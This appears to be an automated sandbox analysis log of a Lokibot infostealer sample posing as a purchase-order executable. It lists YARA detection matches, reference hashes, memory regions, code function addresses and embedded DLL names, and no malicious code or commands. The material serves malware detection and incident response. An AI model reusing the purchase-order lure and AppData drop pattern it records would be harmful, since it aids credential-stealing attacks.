Source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: PO-0Y9005373R664.exe PID: 6964, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: VvtddClQv.exe PID: 3788, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: VvtddClQv.exe PID: 4780, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Code function: 0_2_075B10D0	0_2_075B10D0
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Code function: 0_2_010D08A8	0_2_010D08A8
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Code function: 0_2_010D7B28	0_2_010D7B28
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Code function: 0_2_010D7B38	0_2_010D7B38
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Code function: 0_2_04F96FA0	0_2_04F96FA0
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Code function: 0_2_04F96F90	0_2_04F96F90
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Code function: 0_2_04F95F84	0_2_04F95F84
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 10_2_00AD08A8	10_2_00AD08A8
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 10_2_00AD0899	10_2_00AD0899
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 10_2_00AD7B38	10_2_00AD7B38
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 10_2_04FB10B0	10_2_04FB10B0
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 10_2_04FB10A1	10_2_04FB10A1
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 10_2_04FB31A8	10_2_04FB31A8
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 10_2_07002AF0	10_2_07002AF0
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 10_2_070057C0	10_2_070057C0
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 10_2_070057D0	10_2_070057D0
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 10_2_0700F318	10_2_0700F318
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 10_2_07007340	10_2_07007340
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 10_2_07006F08	10_2_07006F08
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 10_2_07006EFB	10_2_07006EFB
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 10_2_07005C08	10_2_07005C08
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 10_2_07007CDF	10_2_07007CDF
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 10_2_07007CF0	10_2_07007CF0
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 10_2_07002AE0	10_2_07002AE0
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 14_2_0040549C	14_2_0040549C
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: 14_2_004029D4	14_2_004029D4

Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Code function: String function: 00405B6F appears 42 times

Source: PO-0Y9005373R664.exe

Static PE information: invalid certificate

Source: PO-0Y9005373R664.exe	Binary or memory string: OriginalFilename vs PO-0Y9005373R664.exe
Source: PO-0Y9005373R664.exe, 00000000.00000002.1744170270.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PO-0Y9005373R664.exe
Source: PO-0Y9005373R664.exe, 00000000.00000002.1762161732.0000000007550000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs PO-0Y9005373R664.exe
Source: PO-0Y9005373R664.exe, 00000000.00000002.1758190593.0000000005500000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCasio.dllD vs PO-0Y9005373R664.exe
Source: PO-0Y9005373R664.exe, 00000000.00000002.1745375841.0000000003B73000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCasio.dllD vs PO-0Y9005373R664.exe
Source: PO-0Y9005373R664.exe, 00000000.00000002.1745375841.0000000003E64000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs PO-0Y9005373R664.exe
Source: PO-0Y9005373R664.exe, 00000000.00000002.1758450748.0000000005530000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSalmun.dll. vs PO-0Y9005373R664.exe
Source: PO-0Y9005373R664.exe, 00000000.00000000.1684307388.00000000006C2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameQUbn.exe0 vs PO-0Y9005373R664.exe
Source: PO-0Y9005373R664.exe, 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCasio.dllD vs PO-0Y9005373R664.exe
Source: PO-0Y9005373R664.exe	Binary or memory string: OriginalFilenameQUbn.exe0 vs PO-0Y9005373R664.exe

Source: PO-0Y9005373R664.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
